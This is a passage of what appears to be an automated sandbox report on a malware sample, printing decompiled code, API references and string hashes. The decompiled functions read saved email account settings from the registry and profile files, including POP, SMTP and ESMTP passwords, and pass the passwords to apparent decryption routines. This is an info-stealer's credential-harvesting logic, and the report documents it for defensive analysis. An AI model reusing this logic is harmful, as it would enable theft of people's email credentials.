                                                              					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                              					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                              					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                              					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                              					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                              					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                              						_a4 = _a4 & 0x00000000;
                                                              					}
                                                              					strcpy( &_v1860,  &_v928);
                                                              					strcpy( &_v1728,  &_v796);
                                                              					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                              					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                              					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                              					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                              					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                              						_v8 = _v8 & 0x00000000;
                                                              					}
                                                              					_t123 = _t118 + 0xa9c;
                                                              					strcpy( &_v152, _t123);
                                                              					strcpy( &_v1084, _t123);
                                                              					_t116 = _a4;
                                                              					if(_a4 > 0) {
                                                              						E00401D18( &_v280, _t116);
                                                              					}
                                                              					if(_v408 != 0) {
                                                              						E00402407( &_v940, _t141, _t118);
                                                              					}
                                                              					_t117 = _v8;
                                                              					if(_v8 > 0) {
                                                              						E00401D18( &_v1212, _t117);
                                                              					}
                                                              					if(_v1340 != 0) {
                                                              						E00402407( &_v1872, _t141, _t118);
                                                              					}
                                                              					return RegCloseKey(_a8);
                                                              				}
                                                              				return _t59;
                                                              			}


































                                                              0x00402d9a
                                                              0x00402d9a
                                                              0x00402d9a
                                                              0x00402dad
                                                              0x00402db7
                                                              0x00402dc0
                                                              0x00402dc7
                                                              0x00402dca
                                                              0x00402dcd
                                                              0x00402dd8
                                                              0x00402ddf
                                                              0x00402de0
                                                              0x00402de6
                                                              0x00402df2
                                                              0x00402df3
                                                              0x00402df8
                                                              0x00402dfb
                                                              0x00402e07
                                                              0x00402e0a
                                                              0x00402e14
                                                              0x00402e2a
                                                              0x00402e40
                                                              0x00402e56
                                                              0x00402e67
                                                              0x00402e78
                                                              0x00402e9d
                                                              0x00402e9f
                                                              0x00402e9f
                                                              0x00402eb1
                                                              0x00402ec4
                                                              0x00402eda
                                                              0x00402ef0
                                                              0x00402f04
                                                              0x00402f18
                                                              0x00402f3d
                                                              0x00402f3f
                                                              0x00402f3f
                                                              0x00402f43
                                                              0x00402f51
                                                              0x00402f5e
                                                              0x00402f63
                                                              0x00402f6c
                                                              0x00402f74
                                                              0x00402f74
                                                              0x00402f80
                                                              0x00402f89
                                                              0x00402f89
                                                              0x00402f8e
                                                              0x00402f93
                                                              0x00402f9b
                                                              0x00402f9b
                                                              0x00402fa7
                                                              0x00402fb0
                                                              0x00402fb0
                                                              0x00000000
                                                              0x00402fb8
                                                              0x00402fbf

                                                              APIs
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                              • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                              • strcpy.MSVCRT(?,?), ref: 00402F51
                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$QueryValue$CloseOpen
                                                              • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                              • API String ID: 4127491968-1534328989
                                                              • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                              • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                              • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                              • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
                                                              				char _v276;
                                                              				char _v404;
                                                              				intOrPtr _v408;
                                                              				char _v664;
                                                              				intOrPtr _v796;
                                                              				char _v936;
                                                              				char _v1208;
                                                              				char _v1336;
                                                              				intOrPtr _v1340;
                                                              				char _v1596;
                                                              				intOrPtr _v1728;
                                                              				char _v1868;
                                                              				void* __esi;
                                                              				intOrPtr _t23;
                                                              				void* _t35;
                                                              
                                                              				_t48 = __fp0;
                                                              				E004021D8( &_v936);
                                                              				E004021D8( &_v1868);
                                                              				_t23 = 4;
                                                              				_v796 = _t23;
                                                              				_v1728 = _t23;
                                                              				_v408 = _t23;
                                                              				_v1340 = 1;
                                                              				E00403397(__edi, "SMTPServer",  &_v664);
                                                              				E00403397(__edi, "ESMTPUsername",  &_v404);
                                                              				E00403397(__edi, "ESMTPPassword",  &_v276);
                                                              				E00403397(__edi, "POP3Server",  &_v1596);
                                                              				E00403397(__edi, "POP3Username",  &_v1336);
                                                              				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
                                                              				if(_v276 != 0) {
                                                              					E004033B8( &_v276);
                                                              					_t35 = E00402407( &_v936, __fp0, _a4);
                                                              				}
                                                              				if(_v1208 != 0) {
                                                              					E004033B8( &_v1208);
                                                              					return E00402407( &_v1868, _t48, _a4);
                                                              				}
                                                              				return _t35;
                                                              			}


















                                                              0x004033d7
                                                              0x004033e7
                                                              0x004033f2
                                                              0x004033f9
                                                              0x004033fa
                                                              0x00403400
                                                              0x00403406
                                                              0x00403419
                                                              0x00403423
                                                              0x00403435
                                                              0x00403447
                                                              0x00403459
                                                              0x0040346b
                                                              0x0040347d
                                                              0x00403489
                                                              0x00403491
                                                              0x0040349f
                                                              0x0040349f
                                                              0x004034ab
                                                              0x004034b3
                                                              0x00000000
                                                              0x004034c1
                                                              0x004034c8

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                              • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                              • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                              • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 99%
                                                              			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                              				signed int _v8;
                                                              				void* _v11;
                                                              				char _v12;
                                                              				char _v13;
                                                              				char _v19;
                                                              				char _v20;
                                                              				char _v21;
                                                              				char _v22;
                                                              				char _v23;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				short _v30;
                                                              				short _v32;
                                                              				char* _v36;
                                                              				char* _v40;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v52;
                                                              				char* _v56;
                                                              				char* _v60;
                                                              				char* _v64;
                                                              				char _v76;
                                                              				void _v88;
                                                              				intOrPtr _v92;
                                                              				char* _v96;
                                                              				char* _v100;
                                                              				intOrPtr _v104;
                                                              				char* _v108;
                                                              				char* _v112;
                                                              				char* _v116;
                                                              				char* _v120;
                                                              				char* _v124;
                                                              				intOrPtr _v128;
                                                              				char* _v132;
                                                              				char* _v136;
                                                              				char* _v140;
                                                              				char* _v144;
                                                              				char* _v148;
                                                              				char* _v152;
                                                              				intOrPtr _v156;
                                                              				char* _v160;
                                                              				char* _v164;
                                                              				char* _v168;
                                                              				intOrPtr _v172;
                                                              				char* _v176;
                                                              				char* _v180;
                                                              				char* _v184;
                                                              				char* _v188;
                                                              				char* _v192;
                                                              				char* _v196;
                                                              				intOrPtr _v200;
                                                              				char* _v204;
                                                              				char* _v208;
                                                              				char* _v212;
                                                              				char* _v216;
                                                              				char* _v220;
                                                              				char* _v224;
                                                              				char* _v228;
                                                              				intOrPtr _v232;
                                                              				char* _v236;
                                                              				char* _v240;
                                                              				char* _v244;
                                                              				char* _v248;
                                                              				char* _v252;
                                                              				intOrPtr _v256;
                                                              				char* _v260;
                                                              				char* _v264;
                                                              				char* _v268;
                                                              				char* _v272;
                                                              				char* _v276;
                                                              				char* _v280;
                                                              				intOrPtr _v284;
                                                              				char* _v288;
                                                              				char* _v292;
                                                              				char* _v296;
                                                              				intOrPtr _v300;
                                                              				char* _v304;
                                                              				char* _v308;
                                                              				char* _v312;
                                                              				char* _v316;
                                                              				char* _v320;
                                                              				char* _v324;
                                                              				intOrPtr _v328;
                                                              				char* _v332;
                                                              				char* _v336;
                                                              				char* _v340;
                                                              				char* _v344;
                                                              				char* _v348;
                                                              				char* _v352;
                                                              				char* _v356;
                                                              				char* _v360;
                                                              				char* _v364;
                                                              				intOrPtr _v368;
                                                              				intOrPtr _v372;
                                                              				char* _v376;
                                                              				char* _v380;
                                                              				intOrPtr _v384;
                                                              				char* _v388;
                                                              				char* _v392;
                                                              				intOrPtr _v396;
                                                              				intOrPtr _v400;
                                                              				char* _v404;
                                                              				char* _v408;
                                                              				intOrPtr _v412;
                                                              				char* _v416;
                                                              				char* _v420;
                                                              				char* _v424;
                                                              				char* _v428;
                                                              				intOrPtr _v432;
                                                              				intOrPtr _v436;
                                                              				char* _v440;
                                                              				intOrPtr _v444;
                                                              				char* _v448;
                                                              				char* _v452;
                                                              				char* _v456;
                                                              				char* _v460;
                                                              				intOrPtr _v464;
                                                              				char* _v468;
                                                              				intOrPtr* _t200;
                                                              				char* _t202;
                                                              				char _t203;
                                                              				int _t205;
                                                              				int _t206;
                                                              				intOrPtr _t209;
                                                              				char* _t211;
                                                              				int _t213;
                                                              				void _t216;
                                                              				char _t220;
                                                              				void _t221;
                                                              				int _t226;
                                                              				signed int _t231;
                                                              				intOrPtr* _t232;
                                                              				void _t237;
                                                              				void* _t238;
                                                              				void* _t240;
                                                              				void* _t245;
                                                              				signed int _t246;
                                                              				signed int _t249;
                                                              				int _t250;
                                                              				void* _t251;
                                                              				int _t252;
                                                              				void* _t254;
                                                              				void* _t255;
                                                              				void* _t256;
                                                              
                                                              				_v64 = "amp;";
                                                              				_v60 = "lt;";
                                                              				_v56 = "gt;";
                                                              				_v52 = "quot;";
                                                              				_v48 = "nbsp;";
                                                              				_v44 = "apos;";
                                                              				_v24 = 0x26;
                                                              				_v23 = 0x3c;
                                                              				_v22 = 0x3e;
                                                              				_v21 = 0x22;
                                                              				_v20 = 0x20;
                                                              				_v19 = 0x27;
                                                              				_v468 = "iexcl;";
                                                              				_v464 = "cent;";
                                                              				_v460 = "pound;";
                                                              				_v456 = "curren;";
                                                              				_v452 = "yen;";
                                                              				_v448 = "brvbar;";
                                                              				_v444 = "sect;";
                                                              				_v440 = "uml;";
                                                              				_v436 = "copy;";
                                                              				_v432 = "ordf;";
                                                              				_v428 = "laquo;";
                                                              				_v424 = "not;";
                                                              				_v420 = "shy;";
                                                              				_v416 = "reg;";
                                                              				_v412 = "macr;";
                                                              				_v408 = "deg;";
                                                              				_v404 = "plusmn;";
                                                              				_v400 = "sup2;";
                                                              				_v396 = "sup3;";
                                                              				_v392 = "acute;";
                                                              				_v388 = "micro;";
                                                              				_v384 = "para;";
                                                              				_v380 = "middot;";
                                                              				_v376 = "cedil;";
                                                              				_v372 = "sup1;";
                                                              				_v368 = "ordm;";
                                                              				_v364 = "raquo;";
                                                              				_v360 = "frac14;";
                                                              				_v356 = "frac12;";
                                                              				_v352 = "frac34;";
                                                              				_v348 = "iquest;";
                                                              				_v344 = "Agrave;";
                                                              				_v340 = "Aacute;";
                                                              				_v336 = "Acirc;";
                                                              				_v332 = "Atilde;";
                                                              				_v328 = "Auml;";
                                                              				_v324 = "Aring;";
                                                              				_v320 = "AElig;";
                                                              				_v316 = "Ccedil;";
                                                              				_v312 = "Egrave;";
                                                              				_v308 = "Eacute;";
                                                              				_v304 = "Ecirc;";
                                                              				_v300 = "Euml;";
                                                              				_v296 = "Igrave;";
                                                              				_v292 = "Iacute;";
                                                              				_v288 = "Icirc;";
                                                              				_v284 = "Iuml;";
                                                              				_v280 = "ETH;";
                                                              				_v276 = "Ntilde;";
                                                              				_v272 = "Ograve;";
                                                              				_v268 = "Oacute;";
                                                              				_v264 = "Ocirc;";
                                                              				_v260 = "Otilde;";
                                                              				_v256 = "Ouml;";
                                                              				_v252 = "times;";
                                                              				_v248 = "Oslash;";
                                                              				_v244 = "Ugrave;";
                                                              				_v240 = "Uacute;";
                                                              				_v236 = "Ucirc;";
                                                              				_v232 = "Uuml;";
                                                              				_v228 = "Yacute;";
                                                              				_v224 = "THORN;";
                                                              				_v220 = "szlig;";
                                                              				_v216 = "agrave;";
                                                              				_v212 = "aacute;";
                                                              				_v208 = "acirc;";
                                                              				_v204 = "atilde;";
                                                              				_t200 = _a8;
                                                              				_v28 = _v28 | 0xffffffff;
                                                              				_t231 = 0;
                                                              				_t254 = 0;
                                                              				_v200 = "auml;";
                                                              				_v196 = "aring;";
                                                              				_v192 = "aelig;";
                                                              				_v188 = "ccedil;";
                                                              				_v184 = "egrave;";
                                                              				_v180 = "eacute;";
                                                              				_v176 = "ecirc;";
                                                              				_v172 = "euml;";
                                                              				_v168 = "igrave;";
                                                              				_v164 = "iacute;";
                                                              				_v160 = "icirc;";
                                                              				_v156 = "iuml;";
                                                              				_v152 = "eth;";
                                                              				_v148 = "ntilde;";
                                                              				_v144 = "ograve;";
                                                              				_v140 = "oacute;";
                                                              				_v136 = "ocirc;";
                                                              				_v132 = "otilde;";
                                                              				_v128 = "ouml;";
                                                              				_v124 = "divide;";
                                                              				_v120 = "oslash;";
                                                              				_v116 = "ugrave;";
                                                              				_v112 = "uacute;";
                                                              				_v108 = "ucirc;";
                                                              				_v104 = "uuml;";
                                                              				_v100 = "yacute;";
                                                              				_v96 = "thorn;";
                                                              				_v92 = "yuml;";
                                                              				if( *_t200 == 0) {
                                                              					L45:
                                                              					_t202 = _a4 + _t231;
                                                              					 *_t202 = 0;
                                                              					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                              						return _t202;
                                                              					} else {
                                                              						 *((char*)(_t202 - 1)) = 0;
                                                              						return _t202;
                                                              					}
                                                              				}
                                                              				while(_a12 == 0xffffffff || _a12 > _t254) {
                                                              					_t232 = _t254 + _t200;
                                                              					_t203 =  *_t232;
                                                              					_v13 = _t203;
                                                              					if(_t203 != 0x26) {
                                                              						L33:
                                                              						if(_a16 == 0 || _t203 > 0x20) {
                                                              							 *((char*)(_t231 + _a4)) = _t203;
                                                              							_t231 = _t231 + 1;
                                                              						} else {
                                                              							if(_t231 != _v28) {
                                                              								 *((char*)(_t231 + _a4)) = 0x20;
                                                              								_t231 = _t231 + 1;
                                                              								if(_a20 != 0 && _t231 == 1) {
                                                              									_t231 = 0;
                                                              								}
                                                              							}
                                                              							_v28 = _t231;
                                                              						}
                                                              						_t254 = _t254 + 1;
                                                              						L43:
                                                              						_t200 = _a8;
                                                              						if( *((char*)(_t254 + _t200)) != 0) {
                                                              							continue;
                                                              						}
                                                              						break;
                                                              					}
                                                              					_t249 = 0;
                                                              					_v36 = _t232 + 1;
                                                              					while(1) {
                                                              						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
                                                              						_v8 = _t205;
                                                              						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                              						_t256 = _t256 + 0x10;
                                                              						if(_t206 == 0) {
                                                              							break;
                                                              						}
                                                              						_t249 = _t249 + 1;
                                                              						if(_t249 < 6) {
                                                              							continue;
                                                              						}
                                                              						_t209 = _a8;
                                                              						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
                                                              							L29:
                                                              							_v8 = _v8 & 0x00000000;
                                                              							while(1) {
                                                              								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
                                                              								_v40 = _t211;
                                                              								_t250 = strlen(_t211);
                                                              								_t213 = strncmp(_v36, _v40, _t250);
                                                              								_t256 = _t256 + 0x10;
                                                              								if(_t213 == 0) {
                                                              									break;
                                                              								}
                                                              								_v8 = _v8 + 1;
                                                              								if(_v8 < 0x5f) {
                                                              									continue;
                                                              								}
                                                              								_t203 = _v13;
                                                              								goto L33;
                                                              							}
                                                              							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
                                                              							_t231 = _t231 + 1;
                                                              							_t254 = _t254 + _t250 + 1;
                                                              							goto L43;
                                                              						}
                                                              						_t128 = _t209 + 2; // 0x2
                                                              						_t251 = _t254 + _t128;
                                                              						_t237 =  *_t251;
                                                              						if(_t237 == 0x78 || _t237 == 0x58) {
                                                              							_t159 = _t209 + 3; // 0x3
                                                              							_t245 = _t254 + _t159;
                                                              							_t238 = _t245;
                                                              							_t252 = 0;
                                                              							while(1) {
                                                              								_t216 =  *_t238;
                                                              								if(_t216 == 0) {
                                                              									break;
                                                              								}
                                                              								if(_t216 == 0x3b) {
                                                              									L27:
                                                              									if(_t252 <= 0) {
                                                              										goto L29;
                                                              									}
                                                              									memcpy( &_v88, _t245, _t252);
                                                              									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                              									_t220 = E00406512( &_v88);
                                                              									_t256 = _t256 + 0x10;
                                                              									 *((char*)(_t231 + _a4)) = _t220;
                                                              									_t231 = _t231 + 1;
                                                              									_t254 = _t254 + _t252 + 4;
                                                              									goto L43;
                                                              								}
                                                              								_t252 = _t252 + 1;
                                                              								if(_t252 >= 4) {
                                                              									break;
                                                              								}
                                                              								_t238 = _t238 + 1;
                                                              							}
                                                              							_t252 = _t252 | 0xffffffff;
                                                              							goto L27;
                                                              						} else {
                                                              							_t240 = _t251;
                                                              							_t246 = 0;
                                                              							while(1) {
                                                              								_t221 =  *_t240;
                                                              								if(_t221 == 0) {
                                                              									break;
                                                              								}
                                                              								if(_t221 == 0x3b) {
                                                              									_v8 = _t246;
                                                              									L18:
                                                              									if(_v8 <= 0) {
                                                              										goto L29;
                                                              									}
                                                              									memcpy( &_v76, _t251, _v8);
                                                              									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                              									_t226 = atoi( &_v76);
                                                              									_t256 = _t256 + 0x10;
                                                              									_v32 = _t226;
                                                              									_v12 = 0;
                                                              									asm("stosb");
                                                              									_v30 = 0;
                                                              									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                              									 *((char*)(_t231 + _a4)) = _v12;
                                                              									_t231 = _t231 + 1;
                                                              									_t254 = _t254 + _v8 + 3;
                                                              									goto L43;
                                                              								}
                                                              								_t246 = _t246 + 1;
                                                              								if(_t246 >= 6) {
                                                              									break;
                                                              								}
                                                              								_t240 = _t240 + 1;
                                                              							}
                                                              							_v8 = _v8 | 0xffffffff;
                                                              							goto L18;
                                                              						}
                                                              					}
                                                              					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                              					_t231 = _t231 + 1;
                                                              					_t254 = _t254 + _v8 + 1;
                                                              					goto L43;
                                                              				}
                                                              				goto L45;
                                                              			}



















































































































































                                                              0x0040f813
                                                              0x0040f81a
                                                              0x0040f821
                                                              0x0040f828
                                                              0x0040f82f
                                                              0x0040f836
                                                              0x0040f83d
                                                              0x0040f841
                                                              0x0040f845
                                                              0x0040f849
                                                              0x0040f84d
                                                              0x0040f851
                                                              0x0040f855
                                                              0x0040f85f
                                                              0x0040f869
                                                              0x0040f873
                                                              0x0040f87d
                                                              0x0040f887
                                                              0x0040f891
                                                              0x0040f89b
                                                              0x0040f8a5
                                                              0x0040f8af
                                                              0x0040f8b9
                                                              0x0040f8c3
                                                              0x0040f8cd
                                                              0x0040f8d7
                                                              0x0040f8e1
                                                              0x0040f8eb
                                                              0x0040f8f5
                                                              0x0040f8ff
                                                              0x0040f909
                                                              0x0040f913
                                                              0x0040f91d
                                                              0x0040f927
                                                              0x0040f931
                                                              0x0040f93b
                                                              0x0040f945
                                                              0x0040f94f
                                                              0x0040f959
                                                              0x0040f963
                                                              0x0040f96d
                                                              0x0040f977
                                                              0x0040f981
                                                              0x0040f98b
                                                              0x0040f995
                                                              0x0040f99f
                                                              0x0040f9a9
                                                              0x0040f9b3
                                                              0x0040f9bd
                                                              0x0040f9c7
                                                              0x0040f9d1
                                                              0x0040f9db
                                                              0x0040f9e5
                                                              0x0040f9ef
                                                              0x0040f9f9
                                                              0x0040fa03
                                                              0x0040fa0d
                                                              0x0040fa17
                                                              0x0040fa21
                                                              0x0040fa2b
                                                              0x0040fa35
                                                              0x0040fa3f
                                                              0x0040fa49
                                                              0x0040fa53
                                                              0x0040fa5d
                                                              0x0040fa67
                                                              0x0040fa71
                                                              0x0040fa7b
                                                              0x0040fa85
                                                              0x0040fa8f
                                                              0x0040fa99
                                                              0x0040faa3
                                                              0x0040faad
                                                              0x0040fab7
                                                              0x0040fac1
                                                              0x0040facb
                                                              0x0040fad5
                                                              0x0040fadf
                                                              0x0040fae9
                                                              0x0040faf3
                                                              0x0040faf6
                                                              0x0040fafa
                                                              0x0040fafc
                                                              0x0040fb00
                                                              0x0040fb0a
                                                              0x0040fb14
                                                              0x0040fb1e
                                                              0x0040fb28
                                                              0x0040fb32
                                                              0x0040fb3c
                                                              0x0040fb46
                                                              0x0040fb50
                                                              0x0040fb5a
                                                              0x0040fb64
                                                              0x0040fb6e
                                                              0x0040fb78
                                                              0x0040fb82
                                                              0x0040fb8c
                                                              0x0040fb96
                                                              0x0040fba0
                                                              0x0040fbaa
                                                              0x0040fbb1
                                                              0x0040fbb8
                                                              0x0040fbbf
                                                              0x0040fbc6
                                                              0x0040fbcd
                                                              0x0040fbd4
                                                              0x0040fbdb
                                                              0x0040fbe2
                                                              0x0040fbe9
                                                              0x0040fbf0
                                                              0x0040fbf7
                                                              0x0040fde5
                                                              0x0040fde8
                                                              0x0040fdee
                                                              0x0040fdf1
                                                              0x0040fe04
                                                              0x0040fdfd
                                                              0x0040fdfd
                                                              0x00000000
                                                              0x0040fdfd
                                                              0x0040fdf1
                                                              0x0040fbfe
                                                              0x0040fc0d
                                                              0x0040fc10
                                                              0x0040fc14
                                                              0x0040fc17
                                                              0x0040fd94
                                                              0x0040fd98
                                                              0x0040fdd2
                                                              0x0040fdd5
                                                              0x0040fd9e
                                                              0x0040fda1
                                                              0x0040fda6
                                                              0x0040fdaa
                                                              0x0040fdaf
                                                              0x0040fdb6
                                                              0x0040fdb6
                                                              0x0040fdaf
                                                              0x0040fdb8
                                                              0x0040fdb8
                                                              0x0040fdd6
                                                              0x0040fdd7
                                                              0x0040fdd7
                                                              0x0040fdde
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fdde
                                                              0x0040fc1d
                                                              0x0040fc20
                                                              0x0040fc23
                                                              0x0040fc27
                                                              0x0040fc31
                                                              0x0040fc37
                                                              0x0040fc3c
                                                              0x0040fc41
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fc43
                                                              0x0040fc47
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fc49
                                                              0x0040fc51
                                                              0x0040fd5c
                                                              0x0040fd5c
                                                              0x0040fd60
                                                              0x0040fd63
                                                              0x0040fd6b
                                                              0x0040fd73
                                                              0x0040fd7c
                                                              0x0040fd81
                                                              0x0040fd86
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fd88
                                                              0x0040fd8f
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fd91
                                                              0x00000000
                                                              0x0040fd91
                                                              0x0040fdc5
                                                              0x0040fdc8
                                                              0x0040fdc9
                                                              0x00000000
                                                              0x0040fdc9
                                                              0x0040fc57
                                                              0x0040fc57
                                                              0x0040fc5b
                                                              0x0040fc60
                                                              0x0040fd11
                                                              0x0040fd11
                                                              0x0040fd15
                                                              0x0040fd17
                                                              0x0040fd26
                                                              0x0040fd26
                                                              0x0040fd2a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fd1d
                                                              0x0040fd2f
                                                              0x0040fd31
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fd39
                                                              0x0040fd42
                                                              0x0040fd47
                                                              0x0040fd4f
                                                              0x0040fd52
                                                              0x0040fd55
                                                              0x0040fd56
                                                              0x00000000
                                                              0x0040fd56
                                                              0x0040fd1f
                                                              0x0040fd23
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fd25
                                                              0x0040fd25
                                                              0x0040fd2c
                                                              0x00000000
                                                              0x0040fc6f
                                                              0x0040fc6f
                                                              0x0040fc71
                                                              0x0040fc97
                                                              0x0040fc97
                                                              0x0040fc9b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fc8e
                                                              0x0040fd0c
                                                              0x0040fca1
                                                              0x0040fca5
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fcb3
                                                              0x0040fcbb
                                                              0x0040fcc4
                                                              0x0040fcc9
                                                              0x0040fcd4
                                                              0x0040fce3
                                                              0x0040fceb
                                                              0x0040fcec
                                                              0x0040fcf0
                                                              0x0040fcfc
                                                              0x0040fd02
                                                              0x0040fd03
                                                              0x00000000
                                                              0x0040fd03
                                                              0x0040fc90
                                                              0x0040fc94
                                                              0x00000000
                                                              0x00000000
                                                              0x0040fc96
                                                              0x0040fc96
                                                              0x0040fc9d
                                                              0x00000000
                                                              0x0040fc9d
                                                              0x0040fc60
                                                              0x0040fc7c
                                                              0x0040fc82
                                                              0x0040fc83
                                                              0x00000000
                                                              0x0040fc83
                                                              0x00000000

                                                              APIs
                                                              • strlen.MSVCRT ref: 0040FC27
                                                              • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                              • memcpy.MSVCRT ref: 0040FCB3
                                                              • atoi.MSVCRT ref: 0040FCC4
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                              • API String ID: 1895597112-3210201812
                                                              • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                              • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
